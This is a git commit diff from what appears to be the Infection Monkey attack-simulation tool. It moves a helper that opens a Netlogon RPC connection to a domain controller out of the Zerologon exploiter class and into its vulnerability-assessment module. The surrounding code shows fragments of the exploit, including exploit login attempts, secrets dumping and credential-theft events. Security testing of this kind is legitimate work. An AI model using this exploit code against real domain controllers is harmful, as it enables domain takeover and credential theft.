Agent: Move connect_to_dc to vuln_assessment.py

This commit is contained in:
Kekoa Kaaikala 2022-10-07 19:38:18 +00:00
parent 86edb63cb4
commit 374d3d8a50
2 changed files with 20 additions and 17 deletions

View File

@ -12,11 +12,10 @@ from binascii import unhexlify
from typing import Dict, List, Optional, Sequence, Tuple
import impacket
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL
from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import (
T1003_ATTACK_TECHNIQUE_TAG,
@ -27,7 +26,11 @@ from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
from infection_monkey.exploit.zerologon_utils.vuln_assessment import (
connect_to_dc,
get_dc_details,
is_exploitable,
)
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.utils.capture_output import StdoutCapture
@ -113,16 +116,6 @@ class ZerologonExploiter(HostExploiter):
return self.exploit_result
@staticmethod
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
@ -230,7 +223,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service.
try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
rpc_con = connect_to_dc(self.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False

View File

@ -2,9 +2,9 @@ import logging
from typing import Optional, Tuple
import nmb.NetBIOS
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.utils.exceptions import DomainControllerNameFetchError
from infection_monkey.model import VictimHost
from infection_monkey.utils.threading import interruptible_iter
@ -12,6 +12,16 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip)
@ -39,7 +49,7 @@ def _get_dc_name(dc_ip: str) -> str:
def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
rpc_con = connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as err:
error_message = f"Exception occurred while connecting to DC: {err}"
logger.info(error_message)